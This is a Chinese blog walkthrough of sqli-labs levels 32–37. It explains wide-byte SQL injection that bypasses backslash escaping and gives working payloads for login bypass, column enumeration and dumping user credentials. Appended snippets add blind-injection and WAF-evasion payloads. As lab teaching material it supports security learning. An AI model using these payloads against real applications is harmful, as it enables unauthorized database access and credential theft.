SQL注入详解 32-37关

最新推荐文章于 2025-03-01 22:49:03 发布
最新推荐文章于 2025-03-01 22:49:03 发布
阅读量1.3k 收藏 7
点赞数 4
分类专栏: Mysql注入天书 文章标签: sql 数据库 mysql 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45744814/article/details/120657452
版权

目录

Less-32(宽字节注入——union联合)

第32关总结:
32关对输入进的单引号及双引号进行了反斜杠转义,我们需要进行宽字节注入,宽字节注入的原理:数据库编码必须是utf-8,gbkb等,不能为ascii编码,\编码为%5c,使用%df与%5c进行拼接,形成%df%5c(一个汉字),变成了一个有多个字符,从而闭合了单引号

  1. 确定注入类型
1'")

从显示结果可以看出来这里对单引号与双引号进行了反斜杠转义,我们首先就会想到宽字节注入
在这里插入图片描述

1%df'
2%df' and 1=1--+
2%df' and 1=2--+

判断出这里为单引号注入类型
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  1. 判断注入字段数及显示位置
1%df' order by 3--+

在这里插入图片描述

-1%df' union select 1,2,3--+

在这里插入图片描述

  1. 查看当前数据库
    在这里插入图片描述
  2. 爆表
    这里我们应该注意:数据库名可以用十六进制格式表示,也可以用database()表示,当在爆列过程中我们只能用十六进制格式表示
    在这里插入图片描述
  3. 爆列
    这里我们可以将列名转换为十六进制格式,也可以将查询该表名的语句代入
-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema=database() limit  3,1)--+

在这里插入图片描述

  1. 查询数据信息
-2%df' union select 1,group_concat(username),group_concat(password) from users--+

在这里插入图片描述

32关源码:
在这里插入图片描述

Less-33(宽字节注入——union联合)

第33关总结:
这关与32关都为宽字节注入,只是在源代码使用的函数不同。32关使用preg_replace()函数对输入字符进行查找替换,33关使用addslashes()函数对输入的字符添加反斜杠

  1. 确定注入类型
    通过验证,这关也存在反斜杠转义
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    注入过程中发现与32关的注入语句是一样的

  2. 查看源码发现不同点
    这里使用了addslashes()函数,这个函数就是添加反斜杠函数
    在这里插入图片描述

Less-34(POST类型宽字节注入)

第34关总结:
首先这关是POST传参形式,也是宽字节注入,和前面一样

  1. 确定注入类型
    通过验证此处存在反斜杠转义
    在这里插入图片描述

在这里插入图片描述
使用万能密码进入

admin%df' or 1=1#

在这里插入图片描述
发现为单引号字符型

  1. 判断注入字段数及显示位置
    由于我们始终用户名输入的都是admin�,所以我们不能用order by此时来判断,只能依靠select逐个判断
admin%df' union select 1#
admin%df' union select 1,2#

在这里插入图片描述
在这里插入图片描述

  1. 查看当前数据库
admin%df' union select 1,database()#

在这里插入图片描述
剩余的注入步骤与前面关卡相同

  1. 查看源码,这里使用了addslashes()函数
    在这里插入图片描述

Less-35(数字型宽字节注入)

第35关总结:
这里为数字型sql注入,对输入的字符同样做反斜杠处理,也是宽字节注入,比前面宽字节注入关卡稍微简单一些

  1. 确定注入类型

对输入进来的字符进行了反斜杠处理
在这里插入图片描述

2 and 1=1--+
2 and 1=2--+

在这里插入图片描述

在这里插入图片描述
数字型注入

  1. 查看当前数据库
    在这里插入图片描述
    下面操作与前面关卡相同

  2. 查看源码
    在这里插入图片描述

Less-36(宽字节注入)

第36关总结:
这里也是单引号字符型注入,需要使用宽字节注入来进行绕过。只是源码中的函数不同

  1. 确定注入类型
    存在反斜杠转义
    在这里插入图片描述
2%df' and 1=1--+
2%df' and 1=2--+

在这里插入图片描述
在这里插入图片描述
通过注入发现,这里和前面关卡一样。单引号字符型注入,需要使用宽字节注入来进行绕过。只是源码中的函数不同

  1. 查看源码

函数mysql_real_escape_string()
作用: 转义 SQL 语句中使用的字符串中的特殊字符

下列字符受影响:

\x00
\n
\r


"
\x1a

在这里插入图片描述

Less-37(POST类型宽字节注入)

第37关总结:
37关为POST注入类型,只是源码中的函数变为mysql_real_escape_string(),用于转义 SQL 语句中使用的字符串中的特殊字符

  1. 判断注入类型

通过测试发现,具有反斜杠转义
在这里插入图片描述
通过报错可以看出是单引号注入类型

admin%df'%df")

在这里插入图片描述
万能密码成功进入
在这里插入图片描述

  1. 判断注入字段数及显示位置
admin%df' union select 111111,222222#

在这里插入图片描述

  1. 查看数据库名
    在这里插入图片描述
    剩余的注入操作与前面相同
  2. 查看源码
    函数mysql_real_escape_string()
    作用: 转义 SQL 语句中使用的字符串中的特殊字符

下列字符受影响:

\x00
\n
\r


"
\x1a
在这里插入图片描述

sql注入(入门级)sql思路
认真走好每一小步
06-23 517
通过操纵SQL语句,使得应用程序在数据库上执行攻击者指定的恶意SQL语句的一种攻击方式。攻击者可以通过应用程序的输入界面,如表单、URL参数等方式,将恶意的SQL代码注入到应用程序中,从而访问,修改,删除甚至控制数据库内的数据和系统。
SQL注入详解 23-28
君莫hacker的博客
10-08 866
目录Less-23Less-24Less-25Less-26Less-27Less-28Less-29Less-30Less-31Less-32Less-33Less-34Less-35Less-36 Less-23 确定注入类型并判断显示位置 -1' union select 22,33,44 and '1'='1 查看当前数据库 -1' union select 3,database(),3 or '12'='12 爆表 -1' union select 22,group_conca
基于Sqli-Labs靶场SQL注入-32~37
Joker
01-09 1515
这篇博客我主要讲宽字节注入,包括一些转义函数的简单讲解。主要理解宽字节注入的原理即可。
Less-32(宽字节注入
2301_78554096的博客
03-01 439
Less-32(宽字节注入
SQL-labs的第32——union联合查询攻击 宽字节注入(Get)
qq_73393033的博客
08-09 421
注意只要出现危险字符就会自动添加斜杆。这里的危险字符只有单引号,所以只要写了单引号,就要干扰斜杠。
sqli32:宽字节注入
dirich的博客
06-13 492
宽字节顾名思义就是两个及以上的字节表示一个中文汉字。在sql注入中,当用户输入中包含特殊字符,比如(单引号’),(双引号"),(斜杠/)等,为了过滤用户输入的这些特殊字符,会在字符前面加一个\转义字符对特殊字符进行转义。而大多数网站使用utf-8编码,utf-8编码会认为一个中文字符占三个字节;而后端mysql常用GBK编码,GBK编码认为一个中文占两个字节。所以针对这个原理,我们可以构造中文汉字来绕过字符转义。
渗透测试SQL注入——Sqlilabs详解
人若有志,就不会在半坡停止。
10-18 1150
SQL注入sql注入点:url表单、搜索栏、动态网页(有参数提交的地方)、伪静态、请求头http的头部字段(user-agent、cookie、refer、x-forward-for)安全策略:先上waf 分类、 登录注入、 cms注入、article.php?id=、 数值型 、字符串型 Select * from tb where id=’ $id’ 、有回显 、无回显、 按注入的程度和顺序、 一阶注入 、二阶注入、 其他业务场景、延时盲注、布尔盲注。
数据库-SQL 注入SQL 注入漏洞详解 - Union 注入
qq_31104067的博客
10-15 802
SQL 注入 即是指 Web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 Web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
sql注入靶场sqli-labs常见sql注入漏洞详解
网安小菜鸡的博客
08-05 892
把表里面每一行的结果拼成一个字符串输出(
靶场实操】sql-labs通详解----第一节:基础注入方式(Less-1~Less-10)
goldfish8848的博客
08-01 1354
SQL-Labs是一个专注于SQL注入攻击的在线靶场,提供了从基础到高级的多个卡,供学习者实践和挑战。
DVWA之SQL注入详解(包含知识点)
10-20
因此,对于Web应用的开发者来说,了解SQL注入的原理和防范措施至重要。防御SQL注入的一个基本原则是,永远不要直接使用用户输入拼接到SQL语句中,而是使用预处理语句和参数化查询。预处理语句可以确保用户输入被...
sqli-labs第32
weixin_46023655的博客
08-05 723
宽字节注入
SQL注入详解 38-45
君莫hacker的博客
10-15 516
目录Less-38(堆叠注入)Less-39(堆叠注入)Less-40(堆叠注入)Less-41(堆叠注入)Less-42(登录点堆叠注入)Less-43Less-44Less-45 Less-38(堆叠注入) 第38总结: 从第38开始就是堆叠注入,通过构造语句,可以对数据库进行更大的利用,若权限足够高,我们可以进行对数据库的增删改查,读取写入文件,修改各用户权限,进行更多的利用 判断注入类型 单引号字符型注入 判断注入字段数及显示位置 查看数据库名 爆表 爆列 爆数据 在38,以上的注入
SQL注入(闯游戏)
m0_52326740的博客
08-05 1652
我们发现注入点就在uagent这里因为HTTP_USER_AGENT是可控的,是可以更改的,但是要保证自己的账号密码正确才可以走到那里面去,才可以注入。明显这里就看出了与get传参的不同,这里的传参的参数只用了两个,因为之前用的*去查的,现在只是用的是username和password去查的。这个是从cookie里面取的,然后cookie里面的uname是设置的,然后只需要改uname的进行改变就可以了。然后改中间的concat()里面的值,无非就是将里面的user()改了()括号里面写sql语句。
0x32.SQL注入漏洞测试(时间盲注)
qq_31679787的博客
11-18 305
可以直接在type参数后加flag,发现就能得到数据mozhe1,验证后得到key; 也可以通过测试发现存在延时注入sqlmap爆数据库; 爆表名; 爆列名; 爆数据; 验证后得到key; ...
SQL注入sqli-labs靶场(1-37
热门推荐
qq_68163788的博客
02-03 2万+
sqli-labs是一个用于学习和练习SQL注入的开源项目。它提供了一系列的实验室环境,让用户能够在不同的SQL注入场景中进行练习和测试。这些场景包括基本的SQL注入、盲注、联合查询注入等等。 sqli-labs还提供了详细的说明和解释,帮助用户理解SQL注入的原理和技术。通过这些实验和学习,用户可以更好地了解SQL注入的危害,并学会如何防范和阻止SQL注入攻击
sqli-labs第34
weixin_46023655的博客
08-06 605
sqli-labs第34
SQL注入>>>sql-labs通笔记(一)
qq_43571759的博客
02-24 1260
小记 针对如何学习SQL注入,我自己总结的三个大步骤: 1. 漏洞的判断检测和分类 2. 利用漏洞可以进行的攻击 3. 如何防御这些攻击 ps:以下指的是MySQL注入,MySQL数据库需要注意的一点: MySQL5.0以下:这个版本是没有information_schema这个系统表的(据说这是笔试会遇到的题目),所以无法列表名,只能暴力跑表名; MySQL5.0以上:这个版本默认有一个info...
sqli-labs进阶篇 32~38
Lucky小小吴的小屋
02-06 1142
本文章主要讲述sqli-labs靶场32到38的通心得,从三方面讲述如何通,分别是注入点判断、源码分析、注入过程。文章若有不恰当之处,望指出~~
sql注入详解第15-20
最新发布
03-23
### SQL注入第15至20解法详解 #### 卡15:基于布尔盲注的数据库名获取 在这一中,目标是从 `information_schema` 表中提取当前使用的数据库名称。可以通过逐字符猜测的方式实现布尔盲注攻击。具体方法如下: 通过构造条件语句来判断每个字符是否匹配预期值。例如: ```sql ?id=1' AND SUBSTRING((SELECT database()), 1, 1) = 't' -- ``` 上述查询会验证数据库的第一个字母是否为 `'t'`[^1]。 如果返回页面正常,则说明该字符正确;反之则错误。逐步增加字符串长度即可还原整个数据库名称。 --- #### 卡16:利用时间延迟进行盲注 此要求使用基于时间的盲注技术。可以借助 MySQL 的 `SLEEP()` 函数让服务器响应延时特定秒数。例如: ```sql ?id=1' AND IF(SUBSTRING((SELECT database()), 1, 1)='s', SLEEP(5), NULL) --+ ``` 当条件成立时,服务器将暂停 5 秒再继续处理请求。通过对不同位置上的字符逐一测试,最终可拼凑出完整的数据库名称[^3]。 --- #### 卡17:表名枚举与过滤器应用 本涉及从 `information_schema.tables` 中检索可用表的信息。为了防止直接暴露敏感数据,通常需要绕过某些限制措施。一种常见做法是采用十六进制编码规避键字检测机制。比如: ```sql ?id=-1 UNION SELECT 1,GROUP_CONCAT(TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA=DATABASE()-- ``` 这里运用了 `GROUP_CONCAT()` 将多个结果合并成单个字段显示出来[^2]。 --- #### 卡18:列名探测及其内容读取 一旦确认目标表之后,下一步便是找出其中包含哪些有用列以及它们的内容是什么。同样地,我们可以沿用之前提到过的技巧——即先列出所有可能候选对象然后再分别尝试访问其内部存储的数据项。示例代码片段如下所示: ```sql ?id=-1 UNION ALL SELECT null,column_name,null FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x7573657273--+ ``` 此处我们将表名字转换成了对应的 ASCII 编码形式以便避开潜在的安全防护策略。 --- #### 卡19:联合查询中的高级技巧 有时候单纯依靠简单的 Union Select 并不足以完成任务,这时就需要考虑更加复杂的场景设计。假设存在两个独立但相互联的数据集 A 和 B ,我们希望同时展示来自两者的记录而无需改变原有逻辑结构的话,那么就可以引入交叉连接的概念来进行操作 。例如 : ```sql ?id=1' UNION ALL SELECT username,password FROM users CROSS JOIN (SELECT id FROM orders LIMIT 1 OFFSET 0 ) AS t --+ ``` 这样做的好处在于即使原始应用程序只允许单一输入源也能巧妙突破局限性从而达到目的. --- #### 卡20:绕过 WAF 防护层 最后,在面对较为严格 Web 应用防火墙(WAF)的情况下,灵活调整语法表达方式显得尤为重要。除了前面提及到的一些基本手段之外还可以采取诸如大小写混合书写、添加冗余括号或者替换同义命令词组等方式进一步降低被识别概率。实例演示如下: ```sql ?Id=1/**/Or/**/(SeLeCt/**/UsEr())/**/=/**/'root'# ``` 这种模糊化处理有助于迷惑自动化扫描工具使其难以准确判定意图所在。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值